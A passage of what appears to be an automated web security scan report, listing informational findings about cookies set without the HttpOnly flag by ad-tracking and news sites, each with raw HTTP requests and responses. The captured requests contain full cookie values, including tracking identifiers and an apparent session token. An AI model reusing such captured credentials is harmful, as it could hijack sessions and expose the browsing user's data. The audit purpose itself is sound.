Set-Cookie: BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:55:55 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:55:55 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Date: Mon, 02 May 2011 01:55:56 GMT
Server: HTTP server
Content-Length: 760

document.write('<img src="http://ad.yieldmanager.com/pixel?id=199372&data=218002&id=901810&data=218002&t=2" width="1" height="1"></img><iframe width="0" height="0" frameborder="0" src="http://loadus.e
...[SNIP]...
17.88. http://map.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=3669 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: map.media6degrees.com
Cookie: clid=2lgj1xn01171tpz736nle06u0000000117010701201; ipinfo=2lgj1xn0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lgj1xn01171tpz736nle06u40p9l0023d010j01501; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 02:35:32 GMT; Path=/
Set-Cookie: ipinfo=2lkjr780zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 02:35:32 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sglst=2020sag3lkjr78000000013d010j015010tglkjr78000000013d010j01501; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 02:35:32 GMT; Path=/
Set-Cookie: vstcnt=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 02 May 2011 02:35:31 GMT

GIF89a.............!.......,...........D..;
17.89. http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.washingtonpost.com
Path:   /b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692?AQB=1&ndh=1&t=1%2F4%2F2011%2023%3A33%3A45%200%20300&ce=UTF-8&ns=wpni&pageName=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&g=http%3A%2F%2Fwww.washingtonpost.com%2Fwl%2Fjobs%2Fhome%3Fwpsrc%3DAG0002174%26keyword%3D4846831919%26cre%3D430450907%26g%3D1%26s_kwcid%3DTC-21380-4846831919-e-430450907&cc=USD&ch=wp%20-%20jobs&server=washingtonpost.com%20jobs&v0=AG0002174&events=event1&v1=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&h1=jobs%7Cfront&v2=wp%20-%20jobs&h2=washingtonpost.com%7Cjobs%7Cfront&c8=Monday&c9=12%3A30AM&c10=Weekday&v14=New&v15=First%20Visit&v16=1&c17=First%20Visit&c18=New&c23=jobs%7Cfront&c32=application%20-%20jobs%20cluster%20-%20jobs&c33=anonymous&c34=Commercial&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=983&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650; rss_now=false; wp_pageview=1; __qseg=Q_D|Q_T|Q_2919|Q_2917|Q_1665|Q_1656|Q_1647|Q_1645; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DAG0002174%3B%20s_dslv%3DFirst%2520Visit%3B; s_pers=%20s_nr%3D1304310825793-New%7C1306902825793%3B%20s_lv%3D1304310825795%7C1398918825795%3B%20s_lv_s%3DFirst%2520Visit%7C1304312625795%3B%20s_vmonthnum%3D1306904400800%2526vn%253D1%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1304312625800%3B

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:34:44 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DEF70A05013F13-40000109A0000067[CE]; Expires=Fri, 29 Apr 2016 23:34:44 GMT; Domain=.washingtonpost.com; Path=/
Location: http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692?AQB=1&pccr=true&vidn=26DEF70A05013F13-40000109A0000067&&ndh=1&t=1%2F4%2F2011%2023%3A33%3A45%200%20300&ce=UTF-8&ns=wpni&pageName=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&g=http%3A%2F%2Fwww.washingtonpost.com%2Fwl%2Fjobs%2Fhome%3Fwpsrc%3DAG0002174%26keyword%3D4846831919%26cre%3D430450907%26g%3D1%26s_kwcid%3DTC-21380-4846831919-e-430450907&cc=USD&ch=wp%20-%20jobs&server=washingtonpost.com%20jobs&v0=AG0002174&events=event1&v1=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&h1=jobs%7Cfront&v2=wp%20-%20jobs&h2=washingtonpost.com%7Cjobs%7Cfront&c8=Monday&c9=12%3A30AM&c10=Weekday&v14=New&v15=First%20Visit&v16=1&c17=First%20Visit&c18=New&c23=jobs%7Cfront&c32=application%20-%20jobs%20cluster%20-%20jobs&c33=anonymous&c34=Commercial&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=983&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 30 Apr 2011 23:34:44 GMT
Last-Modified: Mon, 02 May 2011 23:34:44 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www77
Content-Length: 0
Content-Type: text/plain

17.90. http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.yahoo.com
Path:   /s/prweb/20110427/bs_prweb/prweb5276794

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /s/prweb/20110427/bs_prweb/prweb5276794 HTTP/1.1
Host: news.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT; YLS=v=1&p=1&n=9

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Proxy-Connection: close
Server: YTS/1.19.4

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<!--
...[SNIP]...
17.91. http://pix01.revsci.net/J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix01.revsci.net
Path:   /J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J05531/a3/0/3/420/1/0/12FAEFBC31A/0/0/00000000/301977419.gif?D=DM%5FLOC%3Dhttp%3A%2F%2Fwww%252Ewashingtonpost%252Ecom%2Fwl%2Fjobs%2Fhome%253Fwpsrc%253DAG0002174%2526keyword%253D4846831919%2526cre%253D430450907%2526g%253D1%2526s%5Fkwcid%253DTC%2D21380%2D4846831919%2De%2D430450907%2526thisNode%253Dhome%252Ejsp%26DM%5FREF%3D%26DM%5FTIT%3DWashington%20DC%20Area%20Jobs%20%2526%20Careers%3A%20Find%20Your%20Perfect%20Job%2C%20Search%20Now%21%26DM%5FEOM%3D1 HTTP/1.1
Host: pix01.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4ddcf645&0&&4db782ef&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4ddd4f0f&0&&4db785ef&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4ddd5040&0&&4db783f9&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4ddd50a2&0&&4db7974a&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4ddd7ae8&0&&4db793f3&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9SENLipv597JLOz4/ywNPTNxEVAOIYCdRelXOzKIRj+39hgkAwD0RltVgL5OR8z4ufqL2JTRgutCG8bH0i2CxMBFHo63bCHdwHxB4BmexyTA8QJJCrTjwem4Rz6vlfmAXZaPkg3/fgGQdxMq5vA03XyhyjKjrmnx6+FJVKmvq1UtLolE/wIYHveGzjeajpDXWQ1J7CBJjBz4B6eDrX2L08P9ZFPE6oRnJWx8uw8wJBAU393RlttIzV+Qhn8MKk7OQiBDL0BgW4aB/MRo1q9ia3EciExyL5yLPHJjIBNhX+QqfSs5Cl4QzaZ9F29c1QiBqzSWOiWdhbBatzmnixywgT8lvFnT4QL3q0Cj3x9XfuCF0IE+G1vSGcP13Prb15jSRxeRn/X3s2YOmR3K3w4IGfd/riyQEciK7VP3tLodiYFLdClT1RZYi22aneJA71eL7+Ya9/kRvCgp5LiQPt6+rIhd7ZRsW0FEhTWmbpqYcAVEfS0I3sPOGB+WigblQoB5h4djNBQndjcxKmAZ9rGZAPkKN1/UYr+qOjTdwypVpD6P/cdrwUFvb2KW5DQMuxBXRUggNPND2K7/fNsSwE1eFYYWAkfouY3GUlBc02ZuTo+msRjGLZflLAgjK0YKoR5qRhxh1tf+3K1rpnLvPkp9vz9k6PHr4SmrbNefYS1eYWN06OW5SgSYNzlmltyIXRjTzJ8Xgexa9RpvUyxXuyDstcFfBbATJM8gsWvZXVRC05ZxtEuXSpyGib+Z7pD1NAV6PTRkoBxWal3h6saqOb3SGIeMNBJ+jx1JOF1QF42HSqHlryDRDZ5kreBCo098HNm2PCKxfBeYNL4lcGIeYBXTb/+QAoqh0PqlKL5XqdArvsfziWOyLnTh0Kkq8XB7bLjOyK6x1DYKg7uumGCcuzXWMeutXR1EGd5ZojkPFq4/lhF8bFM8/2VZOLN5O155wZf/X9644rvMJpsKp1BZrHZs+/rpF/6Vg/uo2+obA/ipqe7I7Oj/r9T/PZFmGD8BtQINx/SgMTB6KGjn2nGlqBU7iD6LVv3qvJufGtydaJV+FYH7rLKOx0NULq5A+/LZTT6GsUoR2IuhBzpInYsMMiKmKHRhIz3Kvyhv0Y39fsTnOpUH1Ya0wDfK43SrYmnk/T0ct1UlNAk1bx10Q1aY7bidfsGH4wyNw/B//zjaHmOf17HK; rsi_segs_1000000=pUP15jOFb3IQDqIu1Hhm/da3+uSni//DBRincYhphhdmEVPNelSxYUS4+U1Joi+vXIZg3CJmbl6qO0d3dqlvOWYpudTV4Voav+Q+5zpE+UjDPyzpV/8S6whLBR2lB2WawM3t+Fb3ocE+VD+HVCzXcWQrjQd9nfMwL8eiWwp5rJfCON223S82t0AJ7E0fYcONDby07hqAtzkyS/Zh39I6n85ANWCrqvA4l/0dGi3VrJ+5ZyaadxnN/OBC4X5GhWxfABQU5Rl8fKTwUYRcs7znb3Qum3v0KY3igmRpDolWPrACkf1Hc6JQwYLC4MGoQsiXhR/YGQoGf7hVpjxwR4y+8tHqy008ecCB0dNuqTRG; rtc_xaNz=MLsHtSEOYQ5jJhFEjE7V7MKBJ1QDGTL0xZ7zF8dplkWrbITDjmJ8eM707TdmNgaI0g3GXcR/P4Fxz8PfR2IjDW2RJK83tn47FGJ7fdq8ELqyjVgasfcuWDjdORh1shdmyU9uxedGSanbaBz1PaqWM/PREGl/m/qeHXc/WZH+Dgo6X96L+pCBorF+TNxQRAWfzWjMj2I8o9ObxoZCICuBK1/2qL55SlebEPPHZZv0mxkLGyY/WIYPOZhhttuMr3Q4z2/BD8O8pL3CkSzGuuDTvaTc4qCxMoP2Jezab7Qw87iMMi0epru/jxgjCl9WnuD2iMP9Ckn5dTYpQVfaoTdsNkpA7y2M06nH6rH4wEcBgkSx/uBET30t3wIlJ6HsTseIP1z5gWfvqaDt/JAuZpm/cJa2QAmWLJl6wswHJo+HB/6sevl3T1Ahn4inevXQhVzP5SzYP4YkU+DIxlvIq5DKRzbtlJ+t0ni/DWuiUJb+DLW3NUMwiGFMTXNUcvEZk1zr7Qd9etu3kEz3AzjYrZbAyqyXgsLC1QaEfLCSooqB14xwUHyaOJV823ccZQxty6+H4QCPsf4KNBH5KTfvm33EtmPRX6H55suB1YW3hnQdc9AiiXRQag323RigTOhwsgA1U0SNCgdSSrIaUdceMZt7Nt8gD1OxVsOQvH4cKbfBNN5SQzH23EjjvuKap8ozWuTb3OKqW9ddvuo/LcB4KOuJxI03Yohpr3qjo3F91PC+X25pmiXd3QIi; rsiPus_KoZy="MLsXrl8OZi5n4BD3cBZyjuABuWC4Csb0FwUT+Tf/ra2F23Yr8I/oeuwGctxr0i9k80z5+Ts37HpJWH5tx7ymALJCD0jt3YjxTTdM3JvgE976HlS8BET9gOVhjUYb6nxqMxO2LSljPwK3m5C91Tp/+zMbiZ3l0rXTRlqctD+i58MewI/dqdLPzRqf/27Ck4fV/tXYZjC6PsOJ0LP14q9RirhDfT4536oDEBbrBii+FPkl5ulI86i//mF/Ihwohay+AGl7Yn7K2R0FWrjhrOHtaZAMobFZE11r5ProA/7NdGfrf6pDi8cUzwkfwo+puxslrUGAu2uvT5Z0UrY8UwRkxW/vrgzFdXZqCAjwp7vzLO9CE0gZQ7wUlZGJim+VOBL1moOapTPxt4wXMk809VsgCkVFCnZ43yLvCnKFVW67eOExYmd+JNSA6VR1ad6OjY3ES0+TfN1COTV35yB2Je5lVhz8KFs9m3lE6O8klZ3o5XAqY7u1xfcrbqVVmx+aUwamFT5uGIDC3paOb5n5zA0="; rsi_us_1000000="pUMdIz1HMAYU1Q23kD2gQlP9hregpcCW/V5c7M/G6n4W4mvTYenih6EKWpeOr4+Ll/y5R0Unj/LO5PdEBw/eJPglYEstHCojiOu9XSRlWWR/QO1SSuxATYbIb1Lfm+FXekBMjalx+GDpg8auRaANRpH94U/E0lZJWj3fXAp3bIkV5gANlu/6hpI4w2DhRC/NVjY//S1N9dvws5Fcv0coUdJ5ovh/i6KiZ/NTh0SwAPSjFYGtC+n+BhnM7E5ccgkAVCkI932ukgJfzqwALNmXtBxTiwZIth6E1Z2Zd9anAg5EX60juVXtwhNQdqK9t3nO6LbKIyB3MtebdzKy2HVDbRuWLb2lZcUfzB20bxbKl7dD7bFNiKS6voC/k1kAfALYMhC261oMDnN7Pj+HlVnO8O+fDxcFHnLynM7rfPr1Q2PkFDRMIXaVgSfL4HzHiZbZP2AmC8AGdhZxKUfXV4Z99Rc1jtmknr7y9/O2aF45rjN4DXXTL6WcKJVbWylOgxrxUFnOR0S6er3mpddjXfX8uPcdrquy5/WNjZiFo5E9+Vv0DEnaw9phZ0cU7p8Onko84PB5HUGnzJMhBFPJkmmqNZ7LlOfsSRdjb/yPCCEot4PvJfqCpCwPYBz2l4xgSYHCoMHFh+BMm+4H7E+DhB4nCVZr8wEkzjlKDIt0O9cSthlhINJrMKroXythtqiwkeuwjz0Ygb8WpfJnrSOjIsNAt9wP196yM5K/sRFDpa9qA5Lp5nF1wHFHbYkgHAdxcjXpMaVvZ1n0GRjXJDzFqUxnp+5yWhADqUaxQOJ9LOkAGWRyqS1gIgVmxAIVc9d+FAUVCHtXs9sKQrum6vL5mvZt5HdAsvmcqsMTplSR7ALkvg8w3wrl74KIV1pxLFzZKDEAmAj9JSKDhAqlzSkpT9ifpSuGrw+BXDQyuS3hLWRbaSjb3qmhPQln3pZjJlWHUunVoJUbyEpWgRizDaTcMqabtv8+Ronk4VDjkdSas5vuJNKracRLjZa8SPtJdk1o/iLDhC1B6ittEW81WOr3Xm3hK80wa7leBcmEbUn0Hggk0E9lhdVUrOq438eNG/DhIVKO9OC5rYs2ElTc6qyDNdn9bmTUuYjb2jyTEtZAmM73J3hIqp0Nco4jeWB5mfGUj10PwA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_xaNz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP95TOFb3IQDqIu1Hhm9eJF2URyyYddaQTz7GCqw4YkAQ+qw6DMwutBdt7A14dgfNdNJ6boNHoksgj4yo4380GOe0Sly4gefJT6j60BI89IrwI3ERkQN5YzX7WgzdkBuIzeCyU5dWh0FAgZ47wCW2vuLZ+tS/27ziagTP9SATZHprMXjSYHimqnSt3PsWW1ZUw/W5zCuwAjResmzJbCl9JthdiqbMsjkghKMi7yT9T6kQyChlqMgP4aqT7tsmcOD1OLsy5KWuptM4j35YcYAFdcJp/fX5a4t0BTioh7LN+OGQishl0HmZcQTGFp7laT6B4hf5fp2UsWmuRf9bfofL7UdIrBCDeJShiozEtZ8RsSamrMQ/g22rolHVP2OA==; Domain=.revsci.net; Expires=Mon, 30-Apr-2012 23:34:41 GMT; Path=/
Set-Cookie: NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4de2d811&0&&4dbcd64a&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Sun, 29-May-2011 23:34:41 GMT; Path=/
Set-Cookie: rtc_mXZ-=MLsHtaUqYR5jJ5Eert5J4zjwI0Yn0GUmvNxcOH9aUaXt40tHjX8vrSL6lIJv17IAwX/77DMkdThlYBEtanQjHiBOTu6VdD81U54WgfTp1ulWQP/xIrSVh3NFbdqPsMPlBqqoJaTKM2XOC0KXXykHjW00phpzgWrk4LpEqlq46xWLs8WebFJ9co8dW4ExdEJVKDgVM8TS3zM/XVrNVu1vqBCOR8949nZw1Rcva/IoiyX77p/ovb/wkdFouI4dNNN5sFguHBNMSNcKUIr4/Q000/FakMdPzNkviWS5wioQCKcOtbfqrbkr6GSPK1NhGk9hhZqZEnrdgIqZjIcXu3v0H9kvT36K1eYv/EG6m0azxSgssbCQgxA2vxvOG/PgijkOvxPQ14dIYkdeWaewFfby+BXqLABIuFfg/afjjo1LF7VoWe80jJbRqF4iL6UYvgrGmIXGhHvBq8JUxxzxjUC6vjlOc1jRDeUhU9/dNLgeNBoo30uJG/CIb3MMNIiruc8YYpJWUeKmABKZ7nwF2U/ROk2f7dLVpcm5nZAUNqv1wTjWzD7RzzuLow8xWnlY+oX102McprMcv1+0G5Kls8q9+a0tsc145kfssSlrOk9smBE1n2HcHmYPSuaVWFRpnWa6+VH0U8XuJBBkXxqYgupSZQxvzSHAK/8ls+qf4Pau+uAkrqyXp5REHXpZL52sZJbyyHWba7yWYJG7clfknngWYU5lXnV2Zvuh8+ww6lSRfwcQbNlnEGWf1QyfEdQGwlofRE1s102E9mXqm5DJAPuKMj8YbdK/jxyW0ToaeYF3D5g4gvzMU9i0eEeyksIWBlqKdamr7/vAqdxrH5yA2Q==; Domain=.revsci.net; Expires=Mon, 30-Apr-2012 23:34:41 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 01 May 2011 23:34:41 GMT

GIF89a.............!.......,...........D..;
17.92. http://pixel.invitemedia.com/data_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data_sync?partner_id=9&exchange_id=4 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:23:11 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"3\": 1304303011+ \"2\": 1304243633}"; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Content-Length: 512
Set-Cookie: dps2b=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; Max-Age=14400

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4316443142505&PixelID=186","javascr
...[SNIP]...
